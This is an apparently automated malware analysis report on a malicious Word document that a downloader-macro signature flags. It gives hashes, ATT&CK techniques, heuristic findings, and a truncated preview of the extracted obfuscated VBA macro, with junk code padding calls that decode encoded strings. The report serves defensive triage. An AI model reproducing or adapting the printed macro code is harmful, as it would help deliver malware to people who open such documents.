Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 098ac787403ec8f8…

MALICIOUS

Office (OLE)

196.5 KB Created: 2018-03-28 17:00:00 Authoring application: Microsoft Office Word First seen: 2019-01-31
MD5: 85fc4b140129c8a834c9d0dcb8b83e65 SHA-1: 01ccf642704c75815641b78453382501dfba96ba SHA-256: 098ac787403ec8f8bf10b2a7393d9f0edc5cfdd1b2139fdb6c14ab1d194c57e4
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample is identified as malicious by ClamAV and exhibits multiple high-severity heuristic firings related to VBA macros, including AutoOpen and CreateObject calls. The presence of a VBA macro in 'macros.bas' strongly suggests an attempt to execute malicious code. The macro likely attempts to download and execute a second-stage payload, a common technique for malware distribution.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 62497 bytes
SHA-256: 96b4404b733f4588c739072e4c446a1f29d2a6e9e91971d7cc4d1a4321ddf6f6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 19 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ApPDzdH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tUAApGH"
Function RwfZCCWYfwB()
On Error Resume Next
Select Case raFis
      Case 41262
         rsktm = CStr(zWhKk + CStr(83073) - mIpTPG * 88778)
      Case 3890
         SJRqC = BDGJwD
         TIrUHo = Tan(34053 * UYGbki)
End Select
PAbFFmn = OrhuW("CswAxAGUAYQBkADEAYQAzADUAOQAwADAAMgBkADAAYwBjAGUAZABiAGQAMQBlADEAMABmAGQAYQAzAbDVtENk", 3, 76)
Select Case mSlbEc
      Case 51531
         cwQPVi = CStr(bsWDp + CStr(64053) - uzFkow * 69845)
      Case 19749
         SBQRn = XzGsj
         XqZww = Tan(29952 * OEjtDK)
End Select
Select Case LPjPVw
      Case 16950
         tEcDJJ = CStr(NHLzY + CStr(41551) - aShEwi * 91679)
      Case 50306
         pEQri = OUjmK
         SuHwj = Tan(91759 * LIsFKa)
End Select
jbXQcEhR = OrhuW("XLtisJwBmAGQAZABhAGQAMwBkAGQAMwAyADgANAAwAGMAZQBiAGQAOQBkAGYAZQA0ADMANAAxAGEANQAyADQANgAwADgAOABlADYAMABiADQAOQA2ADkANQA2AGMAYQAxADUANwBmADIAOQAzAGYANwA3ADUAOABhAiM", 7, 156)
Select Case NhRzdo
      Case 37321
         mwtSas = CStr(rPmLZI + CStr(46045) - HPjGOO * 95835)
      Case 97802
         QtHhD = IVrlIJ
         RUwSR = Tan(54697 * zBjpH)
End Select
Select Case DwGmhb
      Case 95987
         UWpzwD = CStr(jmShPc + CStr(99812) - pkdTsV * 65369)
      Case 47329
         GXGdj = CFaVz
         iiqQbC = Tan(15417 * jnSDw)
End Select
FVSTzlV = OrhuW("mBiAGQANQA5AGUAYQA2ADAANgAyAGIAYwA1ADUAMgBli3S.m", 2, 42)
Select Case CEHFT
      Case 74461
         QqYzOz = CStr(PboHA + CStr(5487) - BnCRS * 49959)
      Case 32653
         TECjSR = zVCMwO
         RSMDpr = Tan(15449 * LCtHAR)
End Select
Select Case YMZszw
      Case 6360
         mlwzZk = CStr(wOYKr + CStr(39185) - cjzEq * 84165)
      Case 84477
         aECEX = JuiJr
         pJwXK = Tan(99100 * ooQbR)
End Select
vHsOMklrC = OrhuW("U4DkT%345MgB8AG4ATgBrAG0AcQA5AHcAVwB2AEMAMwBIDXX", 7, 39)
Select Case Cjpst
      Case 15731
         zjLsz = CStr(MPoUt + CStr(829) - KjTlc * 88301)
      Case 82082
         DNKckk = YTClB
         LFzFao = Tan(74264 * zUWbQI)
End Select
Select Case jqYqo
      Case 4126
         VZqYY = CStr(SGOpZ + CStr(86736) - sYIkZ * 40234)
      Case 89804
         aXXuN = aDViZ
         FjRmnr = Tan(39767 * jTQGbs)
End Select
pACLiw = OrhuW("Jo5D0AYwBiADAAYQA1ADkAZAA4ADgAYwA5ADAAOQA0ADMAMABkADQAOQA1ADIAZgBiAGUANQA0ADYANwBhAGIAZQA3ADIAMAAyAGUANAA3AGIANwBmADUANwAmfX", 7, 115)
Select Case LinQTH
      Case 5761
         BSiKzs = CStr(tGABR + CStr(18443) - WwhAE * 41764)
      Case 14195
         RSUtO = hSFjC
         PTJjUw = Tan(63587 * JFabV)
End Select
Select Case FIluT
      Case 42907
         qKQkoT = CStr(AjhYzA + CStr(77491) - wjcvY * 59119)
      Case 56566
         jCdtPC = RjqaM
         WMElT = Tan(77249 * OJVWjD)
End Select
fzviw = OrhuW("hhADUAMgAyADkAMABiADEANwA1ADMAZAAwADEAYgA4AGMAZQA3ADEAYwAzADkAYQA5AGEAYQA1ADEAOQA3ADIAOQA2ADIAZgBmADUAMwA0AGUAYwA1AGMAMwA0AGEAOAA1AGQAOQAwADMAMgAynQ,ms30S", 2, 145)
Select Case BSYzE
      Case 24645
         kiLaN = CStr(MQsGZb + CStr(57031) - WXKEqt * 59828)
      Case 43899
         GNLsVw = sWzHm
         sKGqXw = Tan(33941 * zEajf)
End Select
Select Case sPqAX
      Case 27228
         fhNDo = CStr(DvjSQq + CStr(85859) - pniRso * 485)
      Case 65529
         iWYND = GDlXjZ
         jzaKJw = Tan(22200 * zawICc)
End Select
UVbXmT = OrhuW("nTwcANwAxADEAMAA5AGMAMgAxk6PRJO", 4, 22)
Select Case jfZOz
      Case 55830
         hPSAwc = CStr(fSMTH + CStr(8070) - rhfBWX * 60676)
      Case 92083
         EAVuTF = RbFAQK
         IAiSUH = Tan(73071 * uYfszu)
End Select
Select Case imhQB
      Case 94602
         OcAQA = CStr(tNzFiV + CStr(58889) - riEdV * 2361)
      Case 15192
         NdBvKj = TbuDj
         CRDQkw = Tan(54722 * BDphz)
End Select
PChOdamWoZi = Orhu
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.